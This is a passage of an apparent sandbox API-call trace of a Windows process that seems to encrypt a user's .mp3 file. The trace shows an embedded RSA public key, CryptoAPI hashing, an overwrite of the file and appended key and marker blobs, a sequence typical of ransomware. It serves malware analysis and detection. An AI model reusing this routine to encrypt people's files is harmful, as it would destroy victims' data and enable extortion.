"c:\\users\\keecfmwgj\\music\\26hkdh\\dhvo\\fwwkbmzrxnqyjnf.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.499] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=44540) returned 1 [0197.499] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.503] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xadd6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.503] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.506] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.506] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xadfc, lpOverlapped=0x0) returned 1 [0197.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.507] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0197.508] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.508] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.508] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.509] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.509] GetLastError () returned 0x0 [0197.509] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.509] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0197.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.509] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.509] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.510] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xae00) returned 0x2af5168 [0197.510] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea7b8 [0197.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6770 [0197.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea800 [0197.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6788 [0197.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67b8 [0197.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6818 [0197.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67d0 [0197.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.512] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6818 [0197.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0197.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67d0 [0197.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae67b8 [0197.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0197.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0197.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0197.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.515] GetCurrentThreadId () returned 0x5d8 [0197.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2930 [0197.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0197.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.516] GetCurrentThreadId () returned 0x5d8 [0197.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40160 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6818 [0197.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67b8 [0197.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0197.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67d0 [0197.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67a0 [0197.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6830 [0197.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0197.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6800 [0197.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67e8 [0197.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6848 [0197.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67e8 [0197.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0197.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0197.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67b8 [0197.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea800 | out: hHeap=0x2c0000) returned 1 [0197.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0197.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.529] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xadf7, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xadf7, lpOverlapped=0x0) returned 1 [0197.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.530] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xadfc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.530] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.531] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.532] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.532] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, 